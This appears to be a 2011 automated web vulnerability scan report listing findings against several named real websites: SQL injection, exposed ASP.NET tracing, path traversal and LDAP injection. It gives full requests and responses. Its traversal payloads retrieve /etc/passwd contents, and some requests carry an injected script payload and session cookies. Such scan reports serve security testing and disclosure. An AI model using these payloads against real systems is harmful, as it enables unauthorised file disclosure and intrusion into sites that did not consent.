Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 6, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /quotient/2011/05/01/2841/N' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 1

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=UTF-8
Content-Length: 53610


<pre class="cake-debug">
<a href='javascript:void(0);' onclick='document.getElementById("CakeStackTrace1").style.display = (document.getElementById("CakeStackTrace1").style.display == "none" ? "" : "
...[SNIP]...
</b> 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''N'' ORDER BY `report_date` DESC LIMIT 2' at line 2</span>
...[SNIP]...

Request 2

GET /quotient/2011/05/01/2841/N'' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:54:38 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:54:39 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46210

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...

2. ASP.NET tracing enabled

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotwheelscollectors.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.hotwheelscollectors.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:00 GMT
Server: MII-WSD/1.4
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Via: HTTP/1.1 www.hotwheelscollectors.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet
Expires: Mon, 02 May 2011 02:14:01 GMT
Cache-Control: max-age=10800
Content-Type: text/html; charset=utf-8
Content-Length: 21443
Age: 2
Via: 1.1 mdw107102 (MII-APC/1.6)
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { font: 10pt verdana, arial; cellspacing:0; cellp
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

3. File path traversal
There are 6 instances of this issue:


3.1. http://www.ibegin.com/weather/weather_widget.php [background_color parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The background_color parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload ffffff../../../../../../../../etc/passwd%00ffffff was submitted in the background_color parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff../../../../../../../../etc/passwd%00ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.2. http://www.ibegin.com/weather/weather_widget.php [city parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The city parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Reston../../../../../../../../etc/passwd%00Reston was submitted in the city parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston../../../../../../../../etc/passwd%00Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:46:24 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.3. http://www.ibegin.com/weather/weather_widget.php [country parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The country parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload us../../../../../../../../etc/passwd%00us was submitted in the country parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us../../../../../../../../etc/passwd%00us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.4. http://www.ibegin.com/weather/weather_widget.php [font_family parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The font_family parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Verdana../../../../../../../../etc/passwd%00Verdana was submitted in the font_family parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana../../../../../../../../etc/passwd%00Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:55:16 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.5. http://www.ibegin.com/weather/weather_widget.php [state parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The state parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Virginia../../../../../../../../etc/passwd%00Virginia was submitted in the state parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia../../../../../../../../etc/passwd%00Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:45:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

3.6. http://www.ibegin.com/weather/weather_widget.php [type parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ibegin.com
Path:   /weather/weather_widget.php

Issue detail

The type parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload js../../../../../../../../etc/passwd%00js was submitted in the type parameter. The requested file was returned in the application's response.

Request

GET /weather/weather_widget.php?type=js../../../../../../../../etc/passwd%00js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.ibegin.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:44:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 1379


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64

Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/
...[SNIP]...
p:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
jphilp:x:1000:1000:Jaso
...[SNIP]...

4. LDAP injection
There are 3 instances of this issue:


4.1. http://www.cricbuzz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cricbuzz.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. The two requests produced different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15355
X-Varnish: 542435617
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>
                   </tr>
               </table>
                       <div class="error_main">
                               <table cellspacing="0" width="100%" class="cbz_header_white" >
                                       <tr>
                                               <td class="cbz_white_header cbz_white_header_left"></td>
                                               <td class="cbz_white_header cbz_white_
...[SNIP]...

Request 2

GET /*)!(sn=* HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cricbuzz.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 404 CHttpException
Server: nginx
Date: Mon, 02 May 2011 00:08:34 GMT
Content-Type: text/html
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 15616
X-Varnish: 542435619
Age: 0
Via: 1.1 varnish
X-Served-By: garner.cricbuzz.com
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:fb="http://www.facebook.com/2008/fbml"
...[SNIP]...
</li>
   <li><a href="http://live2.cricbuzz.com/live/scorecard/9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match" onclick="return !loadBalance('9935/Kolkata-Knight-Riders-vs-Kings-XI-Punjab-37th-match', 9935,'menu');">KOL vs MOH
        - KOL won
   </a></li>
   <!--
   <li><a href="http://www.cricbuzz.com/icc-cricket-world-cup-2011" style="color:yellow;">ICC World Cup 2011 - New!</a></li>
   
       <li style="float:right;"><a href="http://ads.cricbuzz.com/adserver/adclick.php?bannerid=6764&zoneid=18&source=&dest=http%3A%2F%2Fspecials.cricbuzz.com%2Fipl%2F2010%2Fdspblack%2F" target="_blank" style="color:yellow;">Oomphire Videos</a></li>
   -->    
       <li id="blackberry_comm_show" style="float:right;"></li>    
   
</ul>

</div>

<script language="JavaScript" type="text/javascript" >
function loadBalance(url, matchid,source) {
   if(source == null){
       source = "flash"
   }
   var localServers = ["http://live.cricbuzz.com/live/scorecard/"];
   var localweightArray = [0,0,0,0,0,0,0,0,0,0];
   var localRange = 10;
   var lb = 0;
   try {
       if (hookServers) {
           localServers = hookServers;
           if (LBweightArray)
               localweightArray = LBweightArray;
           if (LBrange)
               localRange = LBrange;
           lb = $.cbz.commons.getRandom() % localRange;
           lb = localweightArray[lb];
       }
   } catch (err) {
   }
   var LBurl = localServers[lb];
   var referrer = window.top.location;
   $.getScript("http://ads.cricbuzz.com/adserver/counter/lb_logger.php?matchid="+ matchid + "&lb=" + LBurl + "&source=" + source + "&referrer=" + referrer);
   window.top.location = LBurl + url;
   return true;
}
</script>

</div>
               <style>

</style>

<div id="main">
<div class="column_left_66 " >
               <div class="column_content">
               <table cellspacing="0" width="100%" class="cbz_header_white" >
                   <tr>
                       <td class="cbz_white_header cbz_white_header_left"></td>
                       <td class="cbz_white_header cbz_white_header_center"></td>
                       <td class="cbz_white_header cbz_white_header_right"></td>

...[SNIP]...

4.2. http://www.washingtonpost.com/wp-adv/jobs4/javascript/jobs_search_box.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.washingtonpost.com
Path:   /wp-adv/jobs4/javascript/jobs_search_box.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. The two requests produced different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /*)(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 1

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: 0e0741cd-f638-4e82-af66-b89bdca7d00c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/business/economy/running-in-the-red-how-the-us-on-the-road-to-surplus-detoured-to-massive-debt/2011/04/28/AFFU7rNF_story.html">Running in the red: How the U.S., on the road to surplus, detoured to massive debt</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/sports/redskins/nfl-draft-2011-redskins-add-nine-more-draft-picks-for-a-total-of-12/2011/04/30/AFTZo7NF_story.html">NFL draft 2011: Redskins add nine more draft picks for a total of 12</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/local/tornado-tally-at-19-for-maryland-and-virginia/2011/04/30/AFySjwOF_story.html">Tornado tally at 19 for Maryland and Virginia</a>
               </li>
           </ul>
   </div>
   <div class="wp-column five">
       <ul class="normal">
           <li>
                   <a href="http://www.washingtonpost.com/world/libya-frontline-turns-quiet-as-rebels-regroup/2011/04/29/AFEwjwNF_story.html">Libya front line turns quiet as rebels regroup</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/lifestyle/style/weighing-in-on-what-kate-middleton-wore-on-her-wedding-day/2011/04/29/AF6O1MHF_story.html">Weighing in on what Kate Middleton wore on her wedding day</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/imagining-a-world-without-the-dollar/2011/04/26/AFjawKEF_story.html">Imagining a world without the dollar</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/world/big-question-day-after-royal-wedding-is-where-prince-william-kate-middleton-will-honeymoon/2011/04/30/AFMfm5JF_story.html">Prince William, Kate Middleton try to carve out some private time; ask media to back</a
...[SNIP]...

Request 2

GET /*)!(sn=*/jobs4/javascript/jobs_search_box.js?version=172 HTTP/1.1
Host: www.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560

Response 2

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
ETag: edf9973f-dbc0-444a-90a1-fdb5e628ed9c
Content-Type: text/html;charset=UTF-8
X-Cnection: close
Cache-Control: max-age=120
Date: Sun, 01 May 2011 23:33:04 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 64073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="EN" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.fac
...[SNIP]...
<a href="http://www.washingtonpost.com/opinions/why-do-americans-still-dislike-atheists/2011/02/18/AFqgnwGF_story.html">Why do Americans still dislike atheists?</a>
               </li>
           <li>
                   <a href="http://www.washingtonpost.com/opinions/2011/04/06/AFNEgnqC_story.html">Why Glenn Beck lost it</a>
               </li>
           <li>
